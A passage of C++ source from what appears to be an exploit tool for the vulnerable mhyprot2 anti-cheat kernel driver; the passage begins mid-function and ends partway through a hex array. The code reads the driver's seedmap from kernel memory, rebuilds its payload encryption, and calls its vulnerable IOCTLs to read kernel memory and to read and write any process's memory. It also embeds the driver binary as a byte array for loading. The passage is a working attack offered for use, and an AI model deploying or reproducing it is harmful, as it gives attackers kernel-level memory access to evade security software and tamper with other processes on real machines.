// driver's base address in the system
//
uint64_t mhyprot_address = win_utils::
obtain_sysmodule_address(MHYPROT_SYSFILE_NAME, debug_prints);
if (!mhyprot_address)
{
logger::log("[!] failed to locate mhyprot module address. (0x%lX)\n", GetLastError());
return false;
}
logger::log("[+] %s is @ 0x%llX\n", MHYPROT_SYSFILE_NAME, mhyprot_address);
//
// read the pointer that points to the seedmap that used to encrypt payloads
// the pointer on the [driver.sys + 0xA0E8]
//
uint64_t seedmap_address = driver_impl::
read_kernel_memory<uint64_t>(mhyprot_address + MHYPROT_OFFSET_SEEDMAP);
logger::log("[+] seedmap in kernel [0x%llX + 0x%lX] @ (seedmap)0x%llX\n",
mhyprot_address, MHYPROT_OFFSET_SEEDMAP, seedmap_address);
if (!seedmap_address)
{
logger::log("[!] failed to locate seedmap in kernel\n");
return false;
}
//
// read the entire seedmap as size of 0x9C0
//
if (!driver_impl::read_kernel_memory(
seedmap_address,
&detail::seedmap,
sizeof(detail::seedmap)
))
{
logger::log("[!] failed to pickup seedmap from kernel\n");
return false;
}
for (int i = 0; i < (sizeof(detail::seedmap) / sizeof(detail::seedmap[0])); i++)
{
if (print_seeds)
logger::log("[+] seedmap (%05d): 0x%llX\n", i, detail::seedmap[i]);
}
logger::log("[<] driver initialized successfully.\n");
return true;
}
//
// generate a key for the payload
//
uint64_t mhyprot::driver_impl::generate_key(uint64_t seed)
{
uint64_t k = ((((seed >> 29) & 0x555555555 ^ seed) & 0x38EB3FFFF6D3) << 17) ^ (seed >> 29) & 0x555555555 ^ seed;
return ((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k ^ ((((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k) >> 43);
}
//
// encrypt the payload
//
void mhyprot::driver_impl::encrypt_payload(void* payload, size_t size)
{
if (size % 8)
{
logger::log("[!] (payload) size must be 8-byte alignment");
return;
}
if (size / 8 >= 312)
{
logger::log("[!] (payload) size must be < 0x9C0");
return;
}
uint64_t* p_payload = (uint64_t*)payload;
DWORD64 key_to_base = 0;
for (DWORD i = 1; i < size / 8; i++)
{
const uint64_t key = driver_impl::generate_key(detail::seedmap[i - 1]);
p_payload[i] = p_payload[i] ^ key ^ (key_to_base + p_payload[0]);
key_to_base += 0x10;
}
}
//
// read memory from the kernel using vulnerable ioctl
//
bool mhyprot::driver_impl::read_kernel_memory(uint64_t address, void* buffer, size_t size)
{
if (!buffer)
{
return false;
}
DWORD payload_size = size + sizeof(DWORD);
PMHYPROT_KERNEL_READ_REQUEST payload = (PMHYPROT_KERNEL_READ_REQUEST)calloc(1, payload_size);
if (!payload)
{
return false;
}
payload->header.address = address;
payload->size = size;
if (!request_ioctl(MHYPROT_IOCTL_READ_KERNEL_MEMORY, payload, payload_size))
{
return false;
}
if (!payload->header.result)
{
memcpy(buffer, (PUCHAR)payload + 4, size);
return true;
}
return false;
}
//
// read specific process memory from the kernel using vulnerable ioctl
// let the driver to execute MmCopyVirtualMemory
//
bool mhyprot::driver_impl::read_user_memory(
uint32_t process_id, uint64_t address, void* buffer, size_t size
)
{
MHYPROT_USER_READ_WRITE_REQUEST payload;
payload.action = MHYPROT_ACTION_READ; // action code
payload.process_id = process_id; // target process id
payload.address = address; // address
payload.buffer = (uint64_t)buffer; // our buffer
payload.size = size; // size
encrypt_payload(&payload, sizeof(payload));
return request_ioctl(
MHYPROT_IOCTL_READ_WRITE_USER_MEMORY,
&payload,
sizeof(payload)
);
}
//
// write specific process memory from the kernel using vulnerable ioctl
// let the driver to execute MmCopyVirtualMemory
//
bool mhyprot::driver_impl::write_user_memory(
uint32_t process_id, uint64_t address, void* buffer, size_t size
)
{
MHYPROT_USER_READ_WRITE_REQUEST payload;
payload.action = MHYPROT_ACTION_WRITE; // action code
payload.process_id = process_id; // target process id
payload.address = (uint64_t)buffer; // our buffer
payload.buffer = address; // destination
payload.size = size; // size
encrypt_payload(&payload, sizeof(payload));
return request_ioctl(
MHYPROT_IOCTL_READ_WRITE_USER_MEMORY,
&payload,
sizeof(payload)
);
}
================================================
FILE: src/mhyprot.hpp
================================================
#pragma once
#include <Windows.h>
#include <fstream>
#include <filesystem>
#include "logger.hpp"
#include "raw_driver.hpp"
#include "file_utils.hpp"
#include "service_utils.hpp"
#define MHYPROT_SERVICE_NAME "mhyprot2"
#define MHYPROT_DISPLAY_NAME "mhyprot2"
#define MHYPROT_SYSFILE_NAME "mhyprot.sys"
#define MHYPROT_SYSMODULE_NAME "mhyprot2.sys"
#define MHYPROT_DEVICE_NAME "\\\\?\\\\mhyprot2"
#define MHYPROT_IOCTL_INITIALIZE 0x80034000
#define MHYPROT_IOCTL_READ_KERNEL_MEMORY 0x83064000
#define MHYPROT_IOCTL_READ_WRITE_USER_MEMORY 0x81074000
#define MHYPROT_ACTION_READ 0x0
#define MHYPROT_ACTION_WRITE 0x1
#define MHYPROT_OFFSET_SEEDMAP 0xA0E8
namespace mhyprot
{
typedef struct _MHYPROT_INITIALIZE
{
DWORD _m_001;
DWORD _m_002;
DWORD64 _m_003;
} MHYPROT_INITIALIZE, *PMHYPROT_INITIALIZE;
typedef struct _MHYPROT_KERNEL_READ_REQUEST
{
union _HEADER
{
DWORD result;
DWORD64 address;
} header;
ULONG size;
} MHYPROT_KERNEL_READ_REQUEST, *PMHYPROT_KERNEL_READ_REQUEST;
typedef struct _MHYPROT_USER_READ_WRITE_REQUEST
{
DWORD64 random_key;
DWORD action;
DWORD unknown_00;
DWORD process_id;
DWORD unknown_01;
DWORD64 buffer;
DWORD64 address;
ULONG size;
ULONG unknown_02;
} MHYPROT_USER_READ_WRITE_REQUEST, *PMHYPROT_USER_READ_WRITE_REQUEST;
namespace detail
{
inline HANDLE device_handle;
inline uint64_t seedmap[312];
inline SC_HANDLE mhyplot_service_handle;
}
bool init();
void unload();
namespace driver_impl
{
bool request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size);
bool driver_init(bool debug_prints = false, bool print_seeds = false);
uint64_t generate_key(uint64_t seed);
void encrypt_payload(void* payload, size_t size);
bool read_kernel_memory(uint64_t address, void* buffer, size_t size);
template<class T> __forceinline T read_kernel_memory(uint64_t address)
{
T buffer;
read_kernel_memory(address, &buffer, sizeof(T));
return buffer;
}
bool read_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
template<class T> __forceinline T read_user_memory(uint32_t process_id, uint64_t address)
{
T buffer;
read_user_memory(process_id, address, &buffer, sizeof(T));
return buffer;
}
bool write_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
template<class T> __forceinline bool write_user_memory(uint32_t process_id, uint64_t address, T value)
{
return write_user_memory(process_id, address, &value, sizeof(T));
}
}
}
================================================
FILE: src/nt.hpp
================================================
#pragma once
#include <Windows.h>
//
// windows native definitions
//
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#endif
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define STATUS_NOT_IMPLEMENTED ((NTSTATUS)0xC0000002L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_INVALID_CID ((NTSTATUS)0xC000000BL)
#define STATUS_NO_SUCH_DEVICE ((NTSTATUS)0xC000000EL)
#define STATUS_NO_SUCH_FILE ((NTSTATUS)0xC000000FL)
#define STATUS_INVALID_DEVICE_REQUEST ((NTSTATUS)0xC0000010L)
#define STATUS_MORE_PROCESSING_REQUIRED ((NTSTATUS)0xC0000016L)
#define STATUS_CONFLICTING_ADDRESSES ((NTSTATUS)0xC0000018L)
#define STATUS_NO_MORE_ENTRIES ((NTSTATUS)0x8000001AL)
#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
#define STATUS_INVALID_PAGE_PROTECTION ((NTSTATUS)0xC0000045L)
#define STATUS_PROCEDURE_NOT_FOUND ((NTSTATUS)0xC000007AL)
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009AL)
#define STATUS_INSTRUCTION_MISALIGNMENT ((NTSTATUS)0xC00000AAL)
#define STATUS_INTERNAL_ERROR ((NTSTATUS)0xC00000E5L)
#define STATUS_INVALID_PARAMETER_1 ((NTSTATUS)0xC00000EFL)
#define STATUS_INVALID_PARAMETER_2 ((NTSTATUS)0xC00000F0L)
#define STATUS_INVALID_PARAMETER_3 ((NTSTATUS)0xC00000F1L)
#define STATUS_INVALID_PARAMETER_4 ((NTSTATUS)0xC00000F2L)
#define STATUS_INVALID_PARAMETER_5 ((NTSTATUS)0xC00000F3L)
#define STATUS_INVALID_PARAMETER_6 ((NTSTATUS)0xC00000F4L)
#define STATUS_INVALID_PARAMETER_7 ((NTSTATUS)0xC00000F5L)
#define STATUS_INVALID_PARAMETER_8 ((NTSTATUS)0xC00000F6L)
#define STATUS_INVALID_PARAMETER_9 ((NTSTATUS)0xC00000F7L)
#define STATUS_INVALID_PARAMETER_10 ((NTSTATUS)0xC00000F8L)
#define STATUS_INVALID_PARAMETER_11 ((NTSTATUS)0xC00000F9L)
#define STATUS_INVALID_PARAMETER_12 ((NTSTATUS)0xC00000FAL)
#define STATUS_INVALID_ADDRESS ((NTSTATUS)0xC0000141L)
#define STATUS_DATATYPE_MISALIGNMENT_ERROR ((NTSTATUS)0xC00002C5L)
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0,
SystemProcessorInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
SystemProcessorPerformanceInformation = 8,
SystemFlagsInformation = 9,
SystemCallTimeInformation = 10,
SystemModuleInformation = 11,
SystemLocksInformation = 12,
SystemStackTraceInformation = 13,
SystemPagedPoolInformation = 14,
SystemNonPagedPoolInformation = 15,
SystemHandleInformation = 16,
SystemObjectInformation = 17,
SystemPageFileInformation = 18,
SystemVdmInstemulInformation = 19,
SystemVdmBopInformation = 20,
SystemFileCacheInformation = 21,
SystemPoolTagInformation = 22,
SystemInterruptInformation = 23,
SystemDpcBehaviorInformation = 24,
SystemFullMemoryInformation = 25,
SystemLoadGdiDriverInformation = 26,
SystemUnloadGdiDriverInformation = 27,
SystemTimeAdjustmentInformation = 28,
SystemSummaryMemoryInformation = 29,
SystemMirrorMemoryInformation = 30,
SystemPerformanceTraceInformation = 31,
SystemObsolete0 = 32,
SystemExceptionInformation = 33,
SystemCrashDumpStateInformation = 34,
SystemKernelDebuggerInformation = 35,
SystemContextSwitchInformation = 36,
SystemRegistryQuotaInformation = 37,
SystemExtendServiceTableInformation = 38,
SystemPrioritySeperation = 39,
SystemVerifierAddDriverInformation = 40,
SystemVerifierRemoveDriverInformation = 41,
SystemProcessorIdleInformation = 42,
SystemLegacyDriverInformation = 43,
SystemCurrentTimeZoneInformation = 44,
SystemLookasideInformation = 45,
SystemTimeSlipNotification = 46,
SystemSessionCreate = 47,
SystemSessionDetach = 48,
SystemSessionInformation = 49,
SystemRangeStartInformation = 50,
SystemVerifierInformation = 51,
SystemVerifierThunkExtend = 52,
SystemSessionProcessInformation = 53,
SystemLoadGdiDriverInSystemSpace = 54,
SystemNumaProcessorMap = 55,
SystemPrefetcherInformation = 56,
SystemExtendedProcessInformation = 57,
SystemRecommendedSharedDataAlignment = 58,
SystemComPlusPackage = 59,
SystemNumaAvailableMemory = 60,
SystemProcessorPowerInformation = 61,
SystemEmulationBasicInformation = 62,
SystemEmulationProcessorInformation = 63,
SystemExtendedHandleInformation = 64,
SystemLostDelayedWriteInformation = 65,
SystemBigPoolInformation = 66,
SystemSessionPoolTagInformation = 67,
SystemSessionMappedViewInformation = 68,
SystemHotpatchInformation = 69,
SystemObjectSecurityMode = 70,
SystemWatchdogTimerHandler = 71,
SystemWatchdogTimerInformation = 72,
SystemLogicalProcessorInformation = 73,
SystemWow64SharedInformation = 74,
SystemRegisterFirmwareTableInformationHandler = 75,
SystemFirmwareTableInformation = 76,
SystemModuleInformationEx = 77,
SystemVerifierTriageInformation = 78,
SystemSuperfetchInformation = 79,
SystemMemoryListInformation = 80,
SystemFileCacheInformationEx = 81,
MaxSystemInfoClass = 82
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID DllBase;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
================================================
FILE: src/raw_driver.hpp
================================================
#pragma once
#include <cstdint>
namespace resource
{
const uint8_t raw_driver[] =
{
0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x80, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD,
0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70,
0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20,
0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A,
0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00,
0x64, 0x86, 0x09, 0x00, 0x9B, 0xFB, 0x39, 0x5F, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xF0, 0x00, 0x22, 0x00, 0x0B, 0x02, 0x0E, 0x10,
0x00, 0x8C, 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xA0, 0x11, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
0x01, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x13, 0x00, 0x00, 0x04, 0x00, 0x00,
0x1B, 0x3F, 0x14, 0x00, 0x01, 0x00, 0x60, 0x41, 0x00, 0x00, 0x10, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3C, 0xE2, 0x00, 0x00,
0x50, 0x00, 0x00, 0x00, 0x00, 0x50, 0x13, 0x00, 0x2C, 0x02, 0x00, 0x00,
0xE0, 0x29, 0x13, 0x00, 0xB0, 0x07, 0x00, 0x00, 0x00, 0xF8, 0x12, 0x00,
0x78, 0x68, 0x00, 0x00, 0x00, 0x40, 0x13, 0x00, 0xCC, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x89, 0x00, 0x00,
0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x00, 0x00, 0x20, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78,
0x74, 0x00, 0x00, 0x00, 0xD0, 0x6E, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x00, 0x70, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68,
0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x9C, 0x15, 0x00, 0x00,
0x00, 0x80, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x48, 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00,
0xF8, 0x15, 0x00, 0x00, 0x00, 0xA0, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
0x00, 0x8A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x70, 0x64, 0x61,
0x74, 0x61, 0x00, 0x00, 0x84, 0x06, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00,
0x00, 0x08, 0x00, 0x00, 0x00, 0x8C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48,
0x50, 0x41, 0x47, 0x45, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x0B, 0x00, 0x00,
0x00, 0xD0, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x20, 0x00, 0x00, 0x60, 0x49, 0x4E, 0x49, 0x54, 0x00, 0x00, 0x00, 0x00,
0x54, 0x0E, 0x00, 0x00, 0x00, 0xE0, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x00, 0xA0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x60, 0x2E, 0x75, 0x70, 0x78,
0x30, 0x00, 0x00, 0x00, 0x90, 0x41, 0x12, 0x00, 0x00, 0xF0, 0x00, 0x00,
0x00, 0x42, 0x12, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x68,
0x2E, 0x72, 0x65, 0x6C, 0x6F, 0x63, 0x00, 0x00, 0xCC, 0x00, 0x00, 0x00,
0x00, 0x40, 0x13, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xF2, 0x12, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x42, 0x2E, 0x72, 0x73, 0x72, 0x63, 0x00, 0x00, 0x00,
0x2C, 0x02, 0x00, 0x00, 0x00, 0x50, 0x13, 0x00, 0x00, 0x04, 0x00, 0x00,
0x00, 0xF4, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xEC, 0x28, 0x48, 0x8D, 0x0D, 0x15,
0x90, 0x00, 0x00, 0xE8, 0xC0, 0x01, 0x00, 0x00, 0x4C, 0x8B, 0x05, 0xC1,
0xA3, 0x00, 0x00, 0x48, 0x8D, 0x15, 0x02, 0x90, 0x00, 0x00, 0x48, 0x8D,
0x0D, 0x93, 0xA3, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x28, 0xE9, 0x32, 0x65,
0x00, 0x00, 0xCC, 0xCC, 0xE9, 0xCB, 0xFF, 0xFF, 0xFF, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x28,
0x48, 0x8B, 0x05, 0x7D, 0xA3, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x0E,
0x48, 0x8D, 0x15, 0xE9, 0xFF, 0xFF, 0xFF, 0x48, 0x3B, 0xC2, 0x74, 0x02,
0xFF, 0xD0, 0x48, 0x83, 0xC4, 0x28, 0xE9, 0x99, 0xFF, 0xFF, 0xFF, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
0x48, 0x83, 0xEC, 0x20, 0x33, 0xED, 0x48, 0x8B, 0xF2, 0x48, 0x8B, 0xF9,
0x48, 0x3B, 0xCD, 0x75, 0x0C, 0x33, 0xC9, 0xE8, 0x68, 0xCF, 0x00, 0x00,
0xE9, 0xE0, 0x00, 0x00, 0x00, 0xB8, 0x08, 0x02, 0x00, 0x00, 0x48, 0x89,
0x0D, 0x37, 0xA3, 0x00, 0x00, 0x48, 0x8D, 0x0D, 0x08, 0xA3, 0x00, 0x00,
0x66, 0x89, 0x05, 0x03, 0xA3, 0x00, 0x00, 0x48, 0x8D, 0x05, 0x32, 0xA3,
0x00, 0x00, 0x66, 0x89, 0x2D, 0xF3, 0xA2, 0x00, 0x00, 0x48, 0x89, 0x05,
0xF4, 0xA2, 0x00, 0x00, 0xFF, 0x15, 0x1E, 0x72, 0x00, 0x00, 0x4C, 0x8D,
0x0D, 0xFF, 0xA2, 0x00, 0x00, 0x4C, 0x8D, 0x05, 0x40, 0x8F, 0x00, 0x00,
0x48, 0x8D, 0x15, 0xD1, 0xA2, 0x00, 0x00, 0x48, 0x8B, 0xCF, 0xE8, 0x81,
0x64, 0x00, 0x00, 0x3B, 0xC5, 0x0F, 0x8C, 0x86, 0x00, 0x00, 0x00, 0x48,
0x8D, 0x0D, 0x22, 0x8F, 0x00, 0x00, 0xE8, 0x4D, 0x01, 0x00, 0x00, 0x3B,
0xC5, 0x8B, 0xD8, 0x7C, 0x6D, 0xE8, 0xD2, 0x01, 0x00, 0x00, 0x48, 0x8B,
0xD6, 0x48, 0x8B, 0xCF, 0xE8, 0xE7, 0xCE, 0x00, 0x00, 0x3B, 0xC5, 0x8B,
0xD8, 0x7C, 0x57, 0x48, 0x8B, 0x05, 0xB2, 0xA2, 0x00, 0x00, 0x40, 0x38,
0x68, 0x30, 0x74, 0x24, 0x48, 0x8B, 0x05, 0x95, 0xA2, 0x00, 0x00, 0x48,
0x39, 0x6F, 0x68, 0x48, 0x0F, 0x45, 0x47, 0x68, 0x48, 0x89, 0x05, 0x85,
0xA2, 0x00, 0x00, 0x48, 0x8D, 0x05, 0xF6, 0xFE, 0xFF, 0xFF, 0x48, 0x89,
0x47, 0x68, 0xEB, 0x22, 0xF6, 0x40, 0x08, 0x02, 0x74, 0x1C, 0x48, 0x8B,
0x05, 0x3B, 0x9C, 0x00, 0x00, 0x48, 0x89, 0x05, 0x6C, 0xA2, 0x00, 0x00,
0x48, 0x8D, 0x05, 0xC5, 0xFE, 0xFF, 0xFF, 0x48, 0x89, 0x05, 0x26, 0x9C,
0x00, 0x00, 0x33, 0xC0, 0xEB, 0x07, 0xE8, 0x85, 0xFE, 0xFF, 0xFF, 0x8B,
0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x6C, 0x24, 0x38, 0x48,
0x8B, 0x74, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B,
0xDA, 0x48, 0x8B, 0xF9, 0xE8, 0xAB, 0xCF, 0x00, 0x00, 0x48, 0x8B, 0xD3,
0x48, 0x8B, 0xCF, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x83, 0xC4, 0x20,
0x5F, 0xE9, 0xA6, 0xFE, 0xFF, 0xFF, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B,
0x05, 0x97, 0x8E, 0x00, 0x00, 0x48, 0x8B, 0xF9, 0x48, 0x8D, 0x0D, 0x75,
0x8E, 0x00, 0x00, 0x48, 0x8D, 0x1D, 0x7E, 0x8E, 0x00, 0x00, 0x48, 0x3B,
0xC1, 0x74, 0x45, 0x48, 0x3B, 0xD8, 0x77, 0x40, 0x48, 0x8B, 0x43, 0x40,
0x48, 0x85, 0xC0, 0x74, 0x18, 0x4C, 0x8B, 0x05, 0xCC, 0xA1, 0x00, 0x00,
0x48, 0x8D, 0x0D, 0x7D, 0x63, 0x00, 0x00, 0x4C, 0x8B, 0xCB, 0x48, 0x8B,
0xD7, 0xFF, 0xD0, 0xEB, 0x12, 0x48, 0x8B, 0x15, 0xB4, 0xA1, 0x00, 0x00,
0x4C, 0x8B, 0xC3, 0x48, 0x8B, 0xCF, 0xE8, 0x61, 0x63, 0x00, 0x00, 0x48,
